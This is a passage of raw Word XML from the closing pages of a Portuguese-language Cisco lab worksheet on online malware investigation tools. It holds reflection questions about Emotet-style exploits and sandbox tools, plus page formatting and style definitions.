        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Pergunta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05119C43" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>O que você vê de diferente nesses envios do relatório que analisamos?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE44679" w14:textId="5E3608DE" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670623B" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Questões para Reflexão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207535D8" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00D407E9">
      <w:pPr>
        <w:pStyle w:val="ReflectionQ"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Você obteve informações significativas sobre a forma como uma exploração de malware sofisticada funciona. O que você aprendeu sobre essas explorações em geral (não necessariamente sobre o Emotet)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F081B" w14:textId="59FF280E" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL25"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6C9FA" w14:textId="77777777" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00D407E9">
      <w:pPr>
        <w:pStyle w:val="ReflectionQ"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE1AB3">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Fique on-line e investigue outros aplicativos de sandbox, ferramentas on-line e execute localmente. Descreva várias outras ferramentas e o que elas fazem. Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F4D92" w14:textId="2CB08125" w:rsidR="004E7D33" w:rsidRPr="00EE1AB3" w:rsidRDefault="00D3116C" w:rsidP="00CA6456">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL25"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6697">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Digite suas respostas aqui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F95E9" w14:textId="77777777" w:rsidR="007A20F3" w:rsidRPr="009641CE" w:rsidRDefault="00D3116C" w:rsidP="00D407E9">
      <w:pPr>
        <w:pStyle w:val="ConfigWindow"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009641CE">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Fim do documento</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007A20F3" w:rsidRPr="009641CE" w:rsidSect="0081465A">
      <w:headerReference w:type="even" r:id="rId6"/>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="even" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>
      <w:headerReference w:type="first" r:id="rId10"/>
      <w:footerReference w:type="first" r:id="rId11"/>
      <w:pgSz w:w="12240" w:h="15840"/>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470C8" w14:textId="77777777" w:rsidR="003A6BE4" w:rsidRDefault="003A6BE4" w:rsidP="0081465A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="23CA499C" w14:textId="77777777" w:rsidR="003A6BE4" w:rsidRDefault="003A6BE4" w:rsidP="008146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B9DA4" w14:textId="77777777" w:rsidR="00A7649F" w:rsidRDefault="00A764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CF989" w14:textId="4CF68794" w:rsidR="0081465A" w:rsidRPr="00DF358B" w:rsidRDefault="00DF358B" w:rsidP="00DF358B">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="right" w:pos="10080"/>
        <w:tab w:val="right" w:pos="10800"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:sym w:font="Symbol" w:char="F0E3"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t xml:space="preserve"> 2017 - 2022 Cisco e/ou suas afiliadas. Todos os direitos reservados. Público da Cisco</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t>9</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-B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685D5" w14:textId="245D77B5" w:rsidR="0081465A" w:rsidRPr="002B5018" w:rsidRDefault="00DB5106" w:rsidP="002B5018">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="right" w:pos="10080"/>
        <w:tab w:val="right" w:pos="10800"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:sym w:font="Symbol" w:char="F0E3"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t xml:space="preserve"> 2017 - 2022 Cisco e/ou suas afiliadas. Todos os direitos reservados. Público da Cisco</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">Página </w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t xml:space="preserve"> de </w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  </w:instrText>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidRPr="002B5018">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="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92BE3" w14:textId="77777777" w:rsidR="003A6BE4" w:rsidRDefault="003A6BE4" w:rsidP="0081465A">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="653D5F1C" w14:textId="77777777" w:rsidR="003A6BE4" w:rsidRDefault="003A6BE4" w:rsidP="0081465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007FD" w14:textId="77777777" w:rsidR="00A7649F" w:rsidRDefault="00A764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AD4AA" w14:textId="229EDE0D" w:rsidR="001322E4" w:rsidRPr="001322E4" w:rsidRDefault="001322E4" w:rsidP="001322E4">
    <w:pPr>
      <w:pStyle w:val="PageHead"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="18" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="10080"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:bCs w:val="0"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="001322E4">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
        <w:bCs w:val="0"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="pt-BR"/>
      </w:rPr>
      <w:t>Laboratório - Ferramentas de investigação de malware on-line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F459E" w14:textId="080A86FE" w:rsidR="0081465A" w:rsidRDefault="0081465A" w:rsidP="00A7649F">
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E97353" wp14:editId="14FA01B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3E"/>
    <w:rsid w:val="0005319A"/>
    <w:rsid w:val="001322E4"/>
    <w:rsid w:val="002B5018"/>
    <w:rsid w:val="002F0424"/>
    <w:rsid w:val="003A6BE4"/>
    <w:rsid w:val="004E7D33"/>
    <w:rsid w:val="005F0707"/>
    <w:rsid w:val="006E61A5"/>
    <w:rsid w:val="006F5608"/>
    <w:rsid w:val="007A20F3"/>
    <w:rsid w:val="007C2889"/>
    <w:rsid w:val="00802555"/>
    <w:rsid w:val="0081465A"/>
    <w:rsid w:val="008A3634"/>
    <w:rsid w:val="008B6697"/>
    <w:rsid w:val="009641CE"/>
    <w:rsid w:val="00A7649F"/>
    <w:rsid w:val="00AA0F5E"/>
    <w:rsid w:val="00AB141B"/>
    <w:rsid w:val="00AF130C"/>
    <w:rsid w:val="00B35930"/>
    <w:rsid w:val="00C7266A"/>
    <w:rsid w:val="00CA6456"/>
    <w:rsid w:val="00CA7975"/>
    <w:rsid w:val="00D3116C"/>
    <w:rsid w:val="00D407E9"/>
    <w:rsid w:val="00DB5106"/>
    <w:rsid w:val="00DC2D04"/>
    <w:rsid w:val="00DF358B"/>
    <w:rsid w:val="00EE1AB3"/>
    <w:rsid w:val="00FB3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935E3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{10358846-1F71-4419-997E-8DCF0227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276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360" w:hanging="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240"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b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>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hint="default"/>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character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="480" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="960" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1200" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
